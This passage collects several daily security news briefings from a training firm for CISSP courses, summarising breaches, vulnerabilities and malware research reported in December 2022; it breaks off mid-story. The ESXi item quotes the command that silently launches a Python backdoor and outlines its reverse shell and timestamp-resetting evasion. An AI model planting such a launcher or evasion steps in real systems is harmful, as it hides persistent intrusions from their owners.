Les Bell and Associates Pty Ltd

Welcome to today's daily briefing on security news relevant to our CISSP (and other) courses. Links within stories may lead to further details in the course notes of some of our courses, and will only be accessible if you are enrolled in the corresponding course - this is a shallow ploy to encourage ongoing study. However, each item ends with a link to the original source.

News Stories

Atlassian Products Not Rotating Session Cookies

Just over a week ago, Bangalore-based threat intelligence firm CloudSEK discovered a breach of their systems which led to a small leak of some customer information. At first, their investigations suggested that an employee's Jira password was compromised in order to gain access to Confluence pages. But upon deeper investigation, the details are a bit more concerning.

In fact, the threat actor did gain access to a CloudSEK employee's Jira account, but this was done using Jira session cookies present in stealer logs being sold on the dark web. Further investigation revealed that the session cookies of Atlassian products such as Jira, Confluence and BitBucket are not invalidated, even if the password is changed, even with 2FA enabled, and remain valid for 30 days. They only expire at that time, or if the user logs out before that time. A password change - or other significant changes - should see session cookies rotated, with a new cookie being issued.

The CloudSEK researchers have confirmed that this flaw can take over Jira accounts at hundreds of companies: over a million compromised computers and over 16,000 Jira cookies are currently for sale on dark web marketplaces. The company has released a free tool which lets companies check to see if their accounts are being advertised on dark web marketplaces; they have also notified Atlassian, who have acknowledged the issue and are working to resolve it.

Kulshrestha, Sparsh and Mayank Satnalika, Security Flaw in Atlassian Products (Jira, Confluence,Trello, BitBucket) Affecting Multiple Companies, blog post, 13 December 2022. Available online at https://cloudsek.com/security-flaw-in-atlassian-products-jira-confluencetrello-bitbucket-affecting-multiple-companies/.

Qakbot Smuggles HTML in SVG Images

Your humble scribe fondly remembers the days of 7-bit ASCII email, before the evils of HTML formatting and massive MIME attachments. In particular, the shift to using highly-capable web browsers as email clients (rather than dumb text-only MUA's) opens up a world of possibilities for malicious users, who now have access to sophisticated scripting capabilities, cross-site scripting and other vectors.

However, crude embedding of malicious JavaScript code can easily be detected by network gateways and other security devices, so attackers have developed HTML smuggling techniques, which obfuscate or encode their payloads to evade detection. Cisco Talos researchers recently found a new technique used by the Qakbot banking trojan/stealer, which involves a particularly convoluted unpacking chain to infect the victim's computer.

The malicious email carries an HTML attachment, which in turn contains an SVG (Scalable Vector Graphics) image. SVG images are defined as XML markup tags, which in this case contain embedded HTML <script> tags. These, in turn, contain JavaScript which carries a base64-encoded password-protected ZIP file, which the user is prompted to open with a supplied password. And if the victim falls for this, they will find it unzips to an ISO file which infects their machine.

Once the machine is infected, it will hijack an email thread and propagate itself to still more victims. This may be a long and convoluted process, but it works, and it works well to evade detection by security devices.

Katz, Adam and Jaeson Schultz, HTML smugglers turn to SVG images, blog post, 13 December 2022. Available online at https://blog.talosintelligence.com/html-smugglers-turn-to-svg-images/.

FBI Takes Down 48 DDoS Sites, DoJ Charges Six Defendants

The FBI is now in the process of seizing 48 internet domains associated with web sites offering DDoS-for-hire services, commonly called "booter" services. The web sites had been used to launch millions of attempted - some successful - distributed denial of service attacks worldwide, targeting educational institutions, government agencies, gaming platforms and millions of individual users, disrupting their services and internet connections.

Although the sites claimed to offer "stresser' services, purportedly used for performance-testing networks and servers, the FBI determined that this was simply pretence, and that "thousands of communications between booter site administrators and their customers . . . make clear that both parties are aware that the customer is not attempting to attack their own computers", according to an affidavit filed in support of court-authorised warrants to seize the sites.

At the same time, prosecutors in both Los Angeles and Alaska filed charges against six defendants across the US, who each allegedly offered one-stop DDoS services, with subscriptions of various lengths and attack volumes. In each case, the FBI posed as a customer and was able to conduct test attacks to confirm that the  "booter" site functions as advertised.

The FBI, in conjunction with the UK National Crime Agency and the Netherlands Police, has launched a campaign using ads placed in search engines, triggered by the keywords associated with DDoS activities - the idea being to deter naive would-be-criminals searching for DDoS services and educate the public on their illegality.

Mrozek, Thom, Federal Prosecutors in Los Angeles and Alaska Charge 6 Defendants with Operating Websites that Offered Computer Attack Services, news release, 14 December 2022. Available online at https://www.justice.gov/usao-cdca/pr/federal-prosecutors-los-angeles-and-alaska-charge-6-defendants-operating-websites.

These news brief blog articles are collected at https://www.lesbell.com.au/blog/index.php?courseid=1. If you would prefer an RSS feed for your reader, the feed can be found at https://www.lesbell.com.au/rss/file.php/1/dd977d83ae51998b0b79799c822ac0a1/blog/user/3/rss.xml.

Copyright to linked articles is held by their individual authors or publishers. Our commentary is licensed under a Creative Commons Attribution-ShareAlike 4.0 International License and is labeled TLP:CLEAR.

Welcome to today's daily briefing on security news relevant to our CISSP (and other) courses. Links within stories may lead to further details in the course notes of some of our courses, and will only be accessible if you are enrolled in the corresponding course - this is a shallow ploy to encourage ongoing study. However, each item ends with a link to the original source.

News Stories

TPG Exchange Servers Breached

Australian telco TPG Telecom has notified the Australian Stock Exchange (ASX) that their security consultants, Mandiant, had found evidence of unauthorised access to a hosted Microsoft Exchange service which hosts email accounts for up to 15,000 business customers of their iiNet and Westnet brands. The announcement gave no indication of the timeframe of the breach - only that it was discovered on 13 December as part of "Mandiant''s ongoing engagement to assist with cyber protection" during which they conducted a "forensic historical review and discovered the unauthorised access".

The analysis revealed that the primary purpose of the threat actor was to search for customers' cryptocurrency and financial information. The unauthorised access has been blocked, additional controls put in place, and all affected customers are being contacted.

2022 has been a bad year for Microsoft Exchange users; one wonders why they keep using it. . .

Rickards, James, Unauthorised access to Hosted Exchange service, market announcement, 14 December 2022. Available online at https://www.asx.com.au/asx/statistics/displayAnnouncement.do?display=pdf&idsId=02612242.

Australia Considers Sanctions on Medibank Hackers

Having introduced Magnitsky Act-like laws to permit international sanctions, the Australian Government is now considering using them against cybercriminals for the first time. The government has previously sanctioned Iran's 'morality police' as well as Iranians and Russians linked to human rights abuses.

The Department of Foreign Affairs and Trade has provided advice to the Minister, Penny Wong, about possible use of these cyber-related powers. In a response tabled to a Senate question on notice, the Department stated, "The department routinely provides advice to ministers on possible sanctions measures, including cyber sanctions".

Hurst, Daniel, Russian Medibank hackers could be first targets of Australian sanctions against cyber-attackers, The Guardian, 15 December 2022. Available online at https://www.theguardian.com/australia-news/2022/dec/15/russian-medibank-hackers-could-be-first-targets-of-australian-sanctions-against-cyber-attackers.

InfraGard Member List Compromised via Social Engineering

The FBI runs a threat information sharing network called InfraGard which has more than 80,000 members, who are supposed to be vetted individuals in security roles - both physical and cyber - at private sector critical infrastructure companies. Now the InfraGard portal and membership database has been breached by a simple, but audacious, social engineering attack.

Security blogger Brian Krebs reports that a thread offering the InfraGard database for sale was posted to a relatively new cybercrime forum called 'Breached'. The database contains the names and contact information for tens of thousands of InfraGard members. The seller is using the handle 'USDoD', with the Defense Department's seal as their avatar, and is asking for $US50,000 - perhaps a bit optimistically, considering much of the information is already publicly available.

The breach was accomplished by submitting a phony membership application using the name, Social Security Number, date of birth and other personal details of a finance corporation CEO. InfraGard requires identity verification by either email or telephone - and while the attacker controlled a suitable email address, they chanced using the CEO's genuine mobile phone number. They got lucky: a month later they received an email stating that their application had been approved.

From there, the attacker had a friend write a Python script to query an API on the InfrGard website, and the data was theirs. As Krebs wrote his article, USDoD still had access to the InfraGard site and was using it to message members.

Krebs, Brian, FBI’s Vetted Info Sharing Network ‘InfraGard’ Hacked, blog post, 13 December 2022. Available online at https://krebsonsecurity.com/2022/12/fbis-vetted-info-sharing-network-infragard-hacked/.

FortiOS 0day Exploited In The Wild

Fortinet has been having a bad year, and this continues as the company has issued an advisory for a heap-based buffer overflow in the SSL VPN component of their ForiOS software. The vulnerability will allow a remote unauthenticated attacker to execute abitrary code or commands via specially-crafted requests.

The advisory provides multiple IOC's which customers should immediately check for; the recommended workaround is to disable the SSL VPN service. The permanent fix is, of course, to upgrade to a later version of FortiOS.

Fortinet PSIRT, FortiOS - heap-based buffer overflow in sslvpnd, PSIRT advisory, 12 December 2022. Available online at https://www.fortiguard.com/psirt/FG-IR-22-398.

Citrix ADC and Gateway Exploits In The Wild

Citrix has released builds to fix a critical vulnerability, CVE-2022-27518, which affects Citrix ADC and Citrix Gateway versions 12.1 and 13.0 which are configured with a SAML SP or IdP configuration. Version 13.0-58.32 is not affected. This vulnerability is being exploited in the wild and customers are urged to update as soon as possible or take other measures to mitigate the problem.

CVE-2022-27518 is an "improper control of a resource through its lifetime" vulnerability - probably a memory problem such as use-after-free or similar - which allows an unauthenticated attacker remote code execution.

The National Security Agency has also issued a guidance document with advice on threat hunting steps Citrix customers can take to look for artifacts on their devices which may be attributed to APT5, also known as Keyhole Panda, UNC2630 and MANGANESE.

Lefkowitz, Peter, Critical security update now available for Citrix ADC, Citrix Gateway, blog post, 13 December 2022. Available online at https://www.citrix.com/blogs/2022/12/13/critical-security-update-now-available-for-citrix-adc-citrix-gateway/.

National Security Agency, APT5: Citrix ADC Threat Hunting Guidance, guidance document, 13 December 2022. Available online at https://media.defense.gov/2022/Dec/13/2003131586/-1/-1/0/CSA-APT5-CITRIXADC-V1.PDF.

These news brief blog articles are collected at https://www.lesbell.com.au/blog/index.php?courseid=1. If you would prefer an RSS feed for your reader, the feed can be found at https://www.lesbell.com.au/rss/file.php/1/dd977d83ae51998b0b79799c822ac0a1/blog/user/3/rss.xml.

Copyright to linked articles is held by their individual authors or publishers. Our commentary is licensed under a Creative Commons Attribution-ShareAlike 4.0 International License and is labeled TLP:CLEAR.

Welcome to today's daily briefing on security news relevant to our CISSP (and other) courses. Links within stories may lead to further details in the course notes of some of our courses, and will only be accessible if you are enrolled in the corresponding course - this is a shallow ploy to encourage ongoing study. However, each item ends with a link to the original source.

News Stories

Python Backdoor Gives Access to VMware ESXi Servers

VMware's ESXi is a popular virtualization platform with a lightweight UNIX-like host OS; it loads a near-fresh root filesystem into RAM on reboot, with only a very few files being preserved through the reboot process. One of these is the /etc/rc.local/local.sh file, which allows customization of the startup process, although it is normally empty other than for a few comments explaining its purpose.

In October, Juniper Threat Labs researchers discovered a backdoor implanted into an ESXi server; the attacker had added 8 lines of code in /etc/rc.local/local.sh, which in turn added a single line of code to another startup file, /bin/hostd-probe.sh and then reset the mtime and atime on the modified file to that of the original, in order to evade detection. That single line of code launches a Python program:

bin/nohup /bin/python -u /store/packages/vmtools.py >/dev/null 2>&1&

Being Python code, that program could run on any POSIX-style platform, but there are indications it is ESXi-specific: the filename is a giveaway, as is a VMware copyright statement at the top of the code, both intended to distract anyone investigating. When run, the code launches a simple web server which will accept password-protected POST requests to either run arbitrary commands and display the result as a web page, or to launch a reverse shell to the attacker's netcat listener. Curiously, this web server binds to localhost:8008, and so the attackers also reconfigure the ESXi reverse HTTP proxy in order to redirect requests to their server.

The initial compromise which allowed installation of the backdoor could not be determined, but the default port number for the reverse shell is 427 which, perhaps not coincidentally, is also the port for OpenSLP, the implementation of the Service Location Protocol used on ESXi, and this is quite probably the service which was exploited to gain access.

The Juniper blog post provides suggested mitigations and pointers to likely IOC's.

Langton, Asher, A Custom Python Backdoor for VMWare ESXi Servers, blog post, 9 December 2022. Available online at https://blogs.juniper.net/en-us/threat-research/a-custom-python-backdoor-for-vmware-esxi-servers.

Chrome Adds Passkey Support

Google has announced that passkey support is now available in Chrome Stable M108, for the Windows 11, macOS and Android platforms. The Android implementation will sync passkeys securely via the Google Password Manager (or, in upcoming versions of Android, any other password manager that supports passkeys).

Passkeys are intended to replace the use of passwords, with all their problems and vulnerabilities, with the use of public-key authentication - passkeys are far more secure, are not leaked in server breaches, and cannot be phished. However, they require web sites and applications to support the W3C WebAuthn API, which is rapidly being deployed on popular sites.

A passkey saved on a device will automatically show up in autofill when the user signs in to a site, and on a desktop device the user can also use a passkey from a nearby mobile device; the browser will relay the authentication traffic between the remote server and the mobile device. In all cases, the private key component of the passkey never leaves the mobile device (rather like the way SSH supports agent forwarding).

Sarraf, Ali, Introducing passkeys in Chrome, Chromium blog, 8 December 2022. Available online at https://blog.chromium.org/2022/12/introducing-passkeys-in-chrome.html.

French Retailer Intersport DOS'ed by Hive Ransomware

Black Friday sales at the French stores of sports retail giant Intersport were badly disrupted when cash registers were shut down and loyalty card and gift card services were also unavailable. Store staff were forced to keep paper records and perform checkouts manually, causing delays.

The cause was a ransomware attack on 23 November, for which credit has been claimed by the Hive ransomware-as-a-service group on its leak website; just why the Hive group has done so is unclear: it might be to encourage Intersport to negotiate the ransom. Intersport would not elaborate, but says it does not believe customer data had been accessed.

Cluley, Graham, Hive ransomware gang claims responsibility for attack on Intersport that left cash registers disabled, blog post, 13 December 2022. Available online at https://www.bitdefender.com/blog/hotforsecurity/hive-ransomware-gang-claims-responsibility-for-attack-on-intersport-that-left-cash-registers-disabled/.

Botnet Brute-Forces WordPress Sites

FortiGuard Labs has provided an analysis of a newly-discovered botnet which is scanning for and then brute-forcing self-hosted WordPress CMS sites. Once the botnet has managed to chance upon credentials which give it access to a site, it then infects the site with a copy of itself and then contacts its C2 server.

GoTrim is written in the Go programming language, and takes advantage of that language's concurrent programming features to perform multiple tasks simultaneously. It is also statically linked, so that when it erases itself, no trace is left behind - although this means that it also does not persist on the victim system. It checks to see if the site is hosted on wordpress.com, and if so it moves on, preferring to focus on self-hosted sites which are generally less well defended.

The backdoor can operate in two modes - client mode, in which it sends HTTP POST requests to its C2 server, or server mode, in which it listens for POST requests. It can also detect other CMS's, as well as the open-source e-commerce merchant server, OpenCart.

FortiGuard Labs, GoTrim: Go-based Botnet Actively Brute Forces WordPress Websites, blog post, 12 November 2022. Available online at https://www.fortinet.com/blog/threat-research/gotrim-go-based-botnet-actively-brute-forces-wordpress-websites.

These news brief blog articles are collected at https://www.lesbell.com.au/blog/index.php?courseid=1. If you would prefer an RSS feed for your reader, the feed can be found at https://www.lesbell.com.au/rss/file.php/1/dd977d83ae51998b0b79799c822ac0a1/blog/user/3/rss.xml.

Copyright to linked articles is held by their individual authors or publishers. Our commentary is licensed under a Creative Commons Attribution-ShareAlike 4.0 International License and is labeled TLP:CLEAR.

Welcome to today's daily briefing on security news relevant to our CISSP (and other) courses. Links within stories may lead to further details in the course notes of some of our courses, and will only be accessible if you are enrolled in the corresponding course - this is a shallow ploy to encourage ongoing study. However, each item ends with a link to the original source.

News Stories

JSON Allows SQL Injection to Bypass Web Application Firewalls

Claroty's Team82 has developed a generic technique which allowed them to bypass web application firewalls while delivering SQL injection payloads.

SQL injection remains one of the leading vulnerabilities in web applications, in large part due to the constant demand for web developers who, without proper security education, copy code fragments from sites like Stack Overflow without realising that the code fragments are just that - fragments intended to demonstrate a technique, and not fully-formed code ready to be copied and pasted into your finished application code (a 2018 study suggested that roughly 50% of answers to PHP questions contain SQL injection vulnerabilities).

The correct fix, of course, is to educate developers, but in the meantime most users depend on web application firewalls, which can detect and block a range of attacks on web applications. However, the technique developed by Team82 works by prepending JSON syntax to the SQL injection payloads - and because many WAF's lack JSON support (even though databases added JSON support many years ago) this threw the parser component of the WAF for a loop, allowing the SQL injection to pass.

The technique worked on all but one WAF the researchers tested, and after they notified the vendors, their products have had JSON support added. The Team82 researchers also added support for the technique to the popular SQLMap open-source exploitation tool, for use by penetration testers.

Moshe, Noam, {JS-ON: Security-OFF}: Abusing JSON-Based SQL to Bypass WAF, blog post, 8 December 2022. Available online at https://claroty.com/team82/research/js-on-security-off-abusing-json-based-sql-to-bypass-waf.

Laurent22, Potential SQL injections vulnerabilities in Stack Overflow PHP questions, automated analysis report, July 2018. Available online at https://laurent22.github.io/so-injections/.

New Waves of Truebot Attacks

Cisco Talos security researchers are reporting an increase in infections by Truebot (also known as Silence.Downloader). Previously, Truebot has been spread via malmails and mainly infected desktop/laptop systems inside corporate networks. The new wave is using two new initial infection mechanisms.

In August, the researchers noticed a small number of cases in which Truebot was run following the exploitation of a vulnerability in the IT asset management product Netwrix Auditor. However, since this tool is not widely used on Internet-facing systems, this remained a limited infection. However, in October a second wave of infection started, this time delivered via Raspberry Robin malware, which usually spreads via USB drives. Between them, these two infections have assembled a botnet of over 1,000 systems worldwide, with a particular focus on Mexico, Brazil and Pakistan. Since November, the attackers have switched to an as-yet-unknown delivery mechanism which has infected over 500 Internet-facing Windows servers in the US, Cana and Brazil.

Post-compromise, the current versions of Truebot download either Cobalt Strike reverse shell or Grace malware payloads, typically followed by a custom 'Teleport' exfiltration tool. However, in some cases, the threat actors go on to deploy Clop ransomware as part of a double extortion attack.

These campaigns seem to involve two different groups: Silence Group, who are originally responsible for Truebot, and TA505, a.k.a. Evil Corp, who are associated with the Grace malware.

Pereira, Tiago, Breaking the silence - Recent Truebot activity, threat advisory, 8 December 2022. Available online at https://blog.talosintelligence.com/breaking-the-silence-recent-truebot-activity/.

Linux Servers Targeted for Cryptomining and More With Chaos RAT

For some time, cryptojacking threat groups have been targeting Linux instances in the cloud, generally using the same sequence of actions after gaining initial access: kill off any competing malware and security products, establish persistence and then execute a Monero cryptominer. But in November Trend Micro researchers observed a new pattern of activity: in this case, a remote access trojan called Chaos (Trojan.Linux.CHAOSRAT) is installed along with the XMRig miner.

The infection ensures persistence by setting up a cron job which will keep downloading and reinstalling itself from Pastebin every 10 minutes, and also installs itself in different locations to further evade removal. The other payload download C2 server is hosted in Russia, but once the Chaos RAT is installed, it connects to a C2 server which appears to be in Hong Kong, reporting detailed configuration of the infected machine.

The RAT is written in Go and has quite comprehensive capabilities: it can provide a reverse shell, upload, download and delete files, take screenshots, restart or shut down the computer. This suggests that this threat actor is considering broadening their activities from just cloud-based cryptomining.

Fiser, David and Alfredo Oliveira, Linux Cryptocurrency Mining Attacks Enhanced via CHAOS RAT, blog post, 12 December 2022. Available online at https://www.trendmicro.com/en_us/research/22/l/linux-cryptomining-enhanced-via-chaos-rat-.html.

UNSW Resets Qbits With Maxwell's Daemon

A story that slipped under our radar for a while: Every student who studies thermodynamics encounters Maxwell's Daemon, a thought-experiment daemon which, by opening a door between two chambers when a highly-excited particle approaches it and closing the door to slow ones, can create a temperature difference between the two, thereby driving a heat engine and achieving - in theory - perpetual motion. Such a daemon is impossible, of course - the daemon itself needs to consume energy to observe the particles and move the door.

But in a modern twist on the idea, quantum computing engineers at University of New South Wales have achieved something similar, using a fast digital voltmeter to observe the temperature of electrons drawn from a warm pool of electrons. In doing so, they make the electron much cooler than the pool it came from, which corresponds to it being in the '0' state.

This is the basis of their new technique for resetting the state of electron spin silicon qubits. The old technique works by cooling electrons to a temperature near absolute zero, and hoping that all the electrons 'relax' to the '0' state, but this still leaves a 20% probability that the electron will be a '1'. The new technique reduces the probability of error to 1% - a major step in improving the reliability of quantum computers.

UNSW Media, New quantum computing feat is a modern twist on a 150-year-old thought experiment, news release, 30 November 2022. Available online at https://newsroom.unsw.edu.au/news/science-tech/new-quantum-computing-feat-modern-twist-150-year-old-thought-experiment.

These news brief blog articles are collected at https://www.lesbell.com.au/blog/index.php?courseid=1. If you would prefer an RSS feed for your reader, the feed can be found at https://www.lesbell.com.au/rss/file.php/1/dd977d83ae51998b0b79799c822ac0a1/blog/user/3/rss.xml.

Copyright to linked articles is held by their individual authors or publishers. Our commentary is licensed under a Creative Commons Attribution-ShareAlike 4.0 International License and is labeled TLP:CLEAR.

Welcome to today's daily briefing on security news relevant to our CISSP (and other) courses. Links within stories may lead to further details in the course notes of some of our courses, and will only be accessible if you are enrolled in the corresponding course - this is a shallow ploy to encourage ongoing study. However, each item ends with a link to the original source.

News Stories

Ethics of Reporting on Privacy Breaches

An interesting article on the ABC (Australia) web site examines the ethical issues faced by reporters in covering privacy breaches such as the recent Medibank breach. It's a topic I explore in a cybersecurity management course I teach, via a case study in which a hotel chain suffers a cryptominer infection via its guest wifi network. A relatively minor incident causes major reputational damage as security bloggers publicize it (coupled with inept crisis communications by the hotel chain's PR person), and I get students to discuss the allocation of responsibility, accountability and liability among the hotel IT staff, the hackers, the bloggers and the hotel guests themselves (after all, do you trust public wifi networks? I don't).

The Medibank breach was much more serious, seeing the release of personal medical information for millions of people. The ABC article examines the role of the general media in increasing the leverage available to extortionists, as well as the impact of reporting on the victims. It's thought-provoking material and useful to bear in mind for any future incident response planning, especially for crisis communications.

Terzon, Emilia, The editorial questions ABC News journalists faced when covering the Medibank data leak, ABC News, 11 December 2022. Available online at https://www.abc.net.au/news/backstory/2022-12-11/editorial-questions-reporting-on-medibank-hack/101737920.

Iranian Web Shell Campaign Uses GitHub as Dead Drop Resolver

Secureworks Counter Threat Unit researchers have reported on a malware campaign being run by a subgroup of the Iranian government sponsored threat group, COBALT MIRAGE. The initial intrusion is performed using any of several techniques; the specific intrusion analyzed by Secureworks started with compromise of a VMware Horizon server using two Log4j vulnerabilities.

Once initial access was obtained, the threat actor uploaded the Drokbk malware as a zip file which was extracted and then executed. The first stage of the malware is a dropper, which is created as a file, SessionService.exe, from an internal resource and then added to the SessionManagerService in order to persist. SessionService.exe is then executed; it begins by finding its C2 domain, which it does using the 'dead drop resolver' technique - this allows an actor to completely change its C2 infrastructure, with operating malware able to rediscover the C2 infrastructure via a public service, such as AWS S3 buckets, Pastebin or even comments on Britney Spears's Instagram account (yes, really). In this case, Drokbk uses the README.md file of a GitHub account to relay the C2 server name.

The analyzed sample initially sent a request, containing the hostname and time, to the C2 server, but no commands were received in response. Drokbk is only one of the tools being used by this threat actor; they are also known to use the Fast Reverse Proxy (FRPC) tool.

Secureworks Counter Threat Unit Team, Drokbk Malware Uses GitHub as Dead Drop Resolver, blog post, 9 December 2022. Available online at https://www.secureworks.com/blog/drokbk-malware-uses-github-as-dead-drop-resolver.

Janicab Reemerges, Targeting Middle East and Europe

The Janicab backdoor, first seen in 2013, has reemerged in a campaign by a threat actor tagged Deathstalker, which appears to be targeting financial and legal institutions as well as travel agents in the Middle East and Europe, according to Kaspersky researchers. Janicab is cross-platform malware, able to run on both macOS and Windows, with the Windows version using a VBScript-based implant as the final stage and, rather than relying on downloaded exploitation tools, has much of the required functionality implemented internally.

Initial compromise is achieved via spear-phishing, using targeted lures in the form of a ZIP file containing a LNK-based dropper as well as a decoy document. Opening the LNK file executes a chain of malware files - an initial loader, a second stage which extracts a CAB archive containing additional resources and Python code, and finally, the last stage which is the Janicab backdoor. This then deploys a new LNK file into the Startup folder in order to persist.

Like Drokbk, described above, Janicab uses the 'dead drop resolver' technique to locate its C2 server - DeathStalker uses YouTube and WordPress web services for this purpose. Once communication is established, Janicab can perform a variety of functions such as keystroke logging, screen capture, running commands, checking for installed malware, etc. - the use of VBScript allows new modules to be added easily, and the number of variants seen to date suggest that it is under active development.

Global Research and Analysis Team, DeathStalker targets legal entities with new Janicab variant, APT report, 8 December 2022. Available online at https://securelist.com/deathstalker-targets-legal-entities-with-new-janicab-variant/108131/.

These news brief blog articles are collected at https://www.lesbell.com.au/blog/index.php?courseid=1. If you would prefer an RSS feed for your reader, the feed can be found at https://www.lesbell.com.au/rss/file.php/1/dd977d83ae51998b0b79799c822ac0a1/blog/user/3/rss.xml.

Copyright to linked articles is held by their individual authors or publishers. Our commentary is licensed under a Creative Commons Attribution-ShareAlike 4.0 International License and is labeled TLP:CLEAR.

Welcome to today's daily briefing on security news relevant to our CISSP (and other) courses. Links within stories may lead to further details in the course notes of some of our courses, and will only be accessible if you are enrolled in the corresponding course - this is a shallow ploy to encourage ongoing study. However, each item ends with a link to the original source.

News Stories

Poorly-maintained E-commerce Sites Infected with Skimmers

Skimmers have increasingly infected online stores, stealing customer credit card details from their web browsers as they enter them for payment processing. In many cases, they are loaded as part of the payment-processing page, typically as third-party libraries that have somehow been included in error by developers, and the problem is exacerbated by the fact that security staff know what is going on on their own systems, but not third-party code on customer browsers.

Now researchers at Jscrambler report on three new threat groups using a new technique to run these attacks. In the first case, the threat actor acquired the expired domain name of a third-party marketing and analytics service called Cockpit, replacing its library with their own malicious code. Using this technique, the attackers were able to compromise over 40 e-commerce sites, exfiltrating credit card details to a C2 server based in Russia. The Cockpit service was shut down in 2014, but the sites had not removed the deprecated libraries - a very basic error.

In the other campaigns, the skimmer code is injected directly, as a fake Google Analytics integration, although the code is similar. In all cases, the site that hosts the Javascript checks the HTTP referrer header value and based on this will either return no script at all (to make analysis more difficult), a default skimmer script, or a site-specific skimmer. It also typically only runs in two specific pages - the order page and the register page. All the campaigns make use of obfuscation techniques and encryption of exfiltrated data to hinder detection and analysis.

Fortuna, Pedro, Pedro Marrucho and David Alves, Defcon Skimming: A new batch of Web Skimming attacks, blog post, 5 November 2022. Available online at https://blog.jscrambler.com/defcon-skimming-a-new-batch-of-web-skimming-attacks/.

Four Sydney Men Arrested for Part in $US100 million Online Scam

Four Chinese nationals living in Sydney have been arrested by the Australian Federal Police for their part in an online investments scam that has resulted in over $US100 million in losses world-wide. The arrests follow intelligence supplied by the US Secret Service which led the AFP to set up Operation Wickham to investigate the scam, in cooperation with the NSW Police Force.

The scam started with a range of social engineering techniques to gain the trust of potential victoms via dating sites, employment sites and messaging platforms before mentioning investment opportunities. Once on the hook, victims were directed to a mixture of legitimate and fraudulent applications that deal in foreign exchange and cryptocurrency trading, but which have been manipulated to show a faked positive return on investments. Victims were also directed to a financial investment service which shows manipulated data through a legitimate application in order to encourage further investment while concealing the fact that their money has actually been stolen.

The four men who were arrested will appear in court in January, when police will allege they were used to register Australian companies in order to enhance the legitimacy of the fraud, as well as to launder the proceeds of the crime through Australian bank accounts (with $A22.5 million being restrained by the AFP in 24 bank accounts). Two of the men, aged 19, will be charged with recklessly dealing with proceeds of crime, while two others, aged 24 and 27, who were arrested in late November while trying to leave the country, are alleged to be the Australian 'controllers' of the syndicate.

AFP Media, Four men charged in Sydney for sophisticated cyber scam - world-wide losses expected to top US$100 million, media release, 9 December 2022. Available online at https://www.afp.gov.au/news-media/media-releases/four-men-charged-sydney-sophisticated-cyber-scam-world-wide-losses.

Google Opens Kimono on Android Privacy

Many Android features run continuously, accessing potentially sensitive information. For example, the Now Playing feature of Pixel phones continuously listens, through the microphone, in order to identify the music you can hear. Now, ask yourself how often you hear people say, "We were just alking yesterday about x, and today I'm getting lots of Facebook ads for x - I swear the these machines are listening to us!", and you can begin to understand why many people have concerns about their personal privacy.

As phone brands compete on the level of proactive personalization they provide, they can only offer services like traffic monitoring, giving efficient navigation as long as consumers will make use of such features. To aid in this, Google has released details of, and open-sourced, a key component of the Android privacy architecture, called Private Compute Core. This is a secure and isolated component of the Android OS that allows users to control how, when and where data is processed, both on-phone and by cloud services - for example, the latest phones are sufficiently powerful to perform some translation tasks on the phone itself, without interacting with the cloud.

In particular, Private Compute Core supports federated learning and analytics, which allows training of machine learning models while keeping private data on the phone. In essence, this downloads a training model to a sample set of users' phones; the models train on the data and then return the training results - not the data - back to the cloud. Model testing is performed in a similar, distributed, fashion, and differential privacy is also applied.

Google has now released a white paper describing the Private Compute Core, which controls data privacy for this process, and has also open-sourced the code as a GitHub project.

Kleidermacher, Dave, Dianne Hackborn and Eugenio Marchiori, Trust in transparency: Private Compute Core, blog post, 8 December 2022. Available online at https://security.googleblog.com/2022/12/trust-in-transparency-private-compute.html.

Cisco Warns of VoIP Phone Vulnerability

Ciso has issued a security advisory for its IP PHone 7800 and 8800 series firmware. A vulnerability in the Cisco Discovery Protocol (CDP) code can allow an unauthenticated attacker on the LAN to perform a stack smashing attack, allowing at least a denial of service, if not remote code execution.

There are no workarounds, other than disabling CDP and relying on Link Layer Discovery Protocol (LLDP) to allow the phone to discover its VLAN, nogotiate PoE, etc. - but this is a non-trivial and labour-intensive process. Enterprises which have been diligent in separating VoIP traffic from other data - ideally on a physically-separate network, if not a VLAN - will be much harder to exploit than those which have not, but ultimately the only fix is to obtain and deploy updated firmware which will be released in January.

Cisco, Cisco IP Phone 7800 and 8800 Series Cisco Discovery Protocol Stack Overflow Vulnerability, security advisory, 8 December 2022. Available online at https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-ipp-oobwrite-8cMF5r7U.

These news brief blog articles are collected at https://www.lesbell.com.au/blog/index.php?courseid=1. If you would prefer an RSS feed for your reader, the feed can be found at https://www.lesbell.com.au/rss/file.php/1/dd977d83ae51998b0b79799c822ac0a1/blog/user/3/rss.xml.

Copyright to linked articles is held by their individual authors or publishers. Our commentary is licensed under a Creative Commons Attribution-ShareAlike 4.0 International License and is labeled TLP:CLEAR.

Welcome to today's daily briefing on security news relevant to our CISSP (and other) courses. Links within stories may lead to further details in the course notes of some of our courses, and will only be accessible if you are enrolled in the corresponding course - this is a shallow ploy to encourage ongoing study. However, each item ends with a link to the original source.

News Stories

Government of Vanuatu Networks Shut Down

We start with a story which seems to have slipped under the radar for the last month. Following an election in the tiny Pacific islands nation of Vanuatu, when the new government took office on 6 November, they discovered that government email accounts would not work - and neither would any other computerized government services, such as drivers licence renewals, tax payments or medical information.

Being a tiny nation spread across many islands, there are few opportunities for redundancy in Vanuatu's computer networks, and so government systems are highly centralized in the capital, Port Vila. Government officials first discovered suspicious activity on their networks on 6 December, but only revealed the breach to local media several days later, with international media slow to pick up on the attack. Meanwhile, government services reverted to using pen and paper - which will severely slow service delivery across the dozens of islands that make up the country.

The Australian Cyber Security Centre has provided assistance, and several weeks on, approximately 70% of government services had been restored. These include financial services, health procurement, immigration and passport data and, most importantly, phone connections for emergency services.

As a small dot on the globe, albeit often voted the happiest nation in the world - and if you have visited, you'll know exactly what I mean - Vanuatu may have escaped attention from cybercriminals. But now the cyber world has caught up with it, and it may possibly have finally been subjected to a ransomware attack, although there is no confirmation of this.

McLaughlin, Jenna, The Pacific island nation of Vanuatu has been knocked offline for more than a month, NPR, 6 December 2022. Available online at https://www.npr.org/2022/12/06/1140752192/the-pacific-island-nation-of-vanuatu-has-been-knocked-offline-for-more-than-a-mo.

Internet Explorer Vulnerabilities Still Causing Damage

The tightly-coupled innards of Windows continue to cause trouble for Microsoft and its customers. Internet Explorer may be officially dead, replaced by Edge, but the Microsoft software ecosystem still relies on IE components for some functionality. An example is Microsoft Word, which renders HTML content in rich text documents using IE.

Now Google's Threat Analysis Group reports the discovery in October of a 0day exploit in the wild, targeting users in South Korea. The lure was an Office document entitled "221031 Seoul Yongsan Itaewon accident response situation (06:00).docx" - a reference to the tragic crowd crush incident during Seoul Halloween celebrations.

